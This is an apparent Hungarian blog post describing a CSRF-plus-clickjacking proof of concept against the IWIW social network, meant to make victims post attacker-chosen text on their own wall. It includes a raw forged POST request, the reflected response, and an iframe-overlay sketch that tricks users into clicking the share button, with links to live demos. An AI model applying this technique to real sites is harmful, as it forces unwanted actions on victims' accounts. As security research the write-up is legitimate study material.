IWIW CSRF + ClickJacking
Cél: másnak az ”Üzenőfal”-ra írni egy általunk meghatározott szöveget.
A CSRF lenne a legkézenfekvőbb megoldás ere a célra, jobban mondva az XSS de ez a bejegyzés most nem erről szól, szóval CSRF: az IWIW nek van valamiféle CSRF védelme, ugyanis tokeneket használ szinte mindenhol, a keresésnél, az üzenet küldésnél stb.
ClickJacking: kivitelezhető viszont rá kell vennünk a felhasználókat, hogy valamit “draggoljanak” legalább kétszer, egyszer amikor a mi szövegünket jelölik ki és egyszer amikor azt átrakják az IWIW-be (lehet egyel is, de nem megbízható) majd kell még egy click a “Megosztás” – gombra, kivitelezhető csak eléggé macerás.
Nézzük meg jobban a CSRF-t, ha nem lenne a token egyszerű dolgunk lenne, viszont így sem hasztalan a technika:
POST /pages/activity/activities.jsp HTTP/1.1 Host: iwiw.hu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.14) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: ajaxable=1; [.. COOKIEK... ] c_resource=WEB_1294970359_37374617; c_jsess=1294970359 Content-Type: multipart/form-data; boundary=---------------------------2735276561659 Content-Length: 570 -----------------------------2735276561659 Content-Disposition: form-data; name="token" 00000000000000000 -----------------------------2735276561659 Content-Disposition: form-data; name="redirect" -----------------------------2735276561659 Content-Disposition: form-data; name="viewerGroup" -1 -----------------------------2735276561659 Content-Disposition: form-data; name="" -----------------------------2735276561659 Content-Disposition: form-data; name="comment" Hello Word! -----------------------------2735276561659--
Válaszként kapunk egy szép hiba üzenetet ”Sikertelen üzenetküldés. Kérjük próbáld újra!” valamint egy kis segítséget:
<div class="commentWrapper"> <textarea class="[...]" title="Mi jár a fejedben?" cols="30" rows="1" name="comment"> Hello Word!</textarea> <div class="cornBot"></div> </div>
Az egyik problémánk megoldódott, a szöveg már ott van a helyén csak annyi dolgunk van, hogy rávegyük a “usert”, hogy clickeljen a “Megosztás” – gombra, amit clickjackingel könnyedén megtehetjük
Vázlat:
[VALOS OLDAL]
XF.style.left = MOUSE.X -10
XF.style.top = MOUSE.y -10
[IFRAME ID="xf" SRC="SAJAT_DOMAINEN.html"] <-- Ezt az iframet lehet görgetni csak.
[IFRAME SRC="SAJAT_DOMAIN2.html" WIDTH=30 HEIGHT="60000" ]
[FORM POST IWIW]
[/FROM]
[JS POST FROM]
[/IFRAME]
[/IFRAME ]
[/VALOS OLDAL]
Live Demo : IWIW CSRF + ClickJacking PoC
Live Demo Látható IFRAME :IWIW CSRF + ClickJacking PoC
* Csak Firefox-ban működik tökéletesen, de a css-el játszódva könnyedén átihatjuk más böngészőre, és User Agent szerint szolgáljuk ki a “usert” a CSS-el.
